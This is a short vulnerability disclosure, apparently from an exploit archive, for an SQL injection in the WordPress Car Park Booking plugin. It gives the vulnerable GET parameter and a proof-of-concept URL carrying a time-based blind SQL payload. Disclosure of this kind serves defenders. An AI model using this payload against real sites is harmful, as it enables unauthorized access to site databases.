WordPress Car Park Booking SQL Injection

WordPress Car Park Booking plugin suffers from a remote SQL injection vulnerability.


MD5 | eef7c64d55a3975b1e686ced7ec5a15f

# Exploit Title: Wordpress Plugin Car Park Booking - SQL Injection
# Date: 2017-10-17
# Exploit Author: 8bitsec
# Vendor Homepage: https://codecanyon.net/item/car-park-booking-wordpress-plugin/20284035
# Software Link: https://codecanyon.net/item/car-park-booking-wordpress-plugin/20284035
# Version: 13 October 17
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
# Email: [email protected]
# Contact: https://twitter.com/_8bitsec

Release Date:
=============
2017-10-17

Product & Service Introduction:
===============================
Generate more sales, enhance your car park booking service, and have more time to organize the business.

Technical Details & Description:
================================

SQL injection on [space_id] parameter.

Proof of Concept (PoC):
=======================

SQLi:

https://localhost/[path]/booking-page/?step=3&space_id=9 AND SLEEP(5)&re_price=12

Parameter: space_id (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: step=3&space_id=9 AND SLEEP(5)&re_price=12

==================
8bitsec - [https://twitter.com/_8bitsec]


Related Posts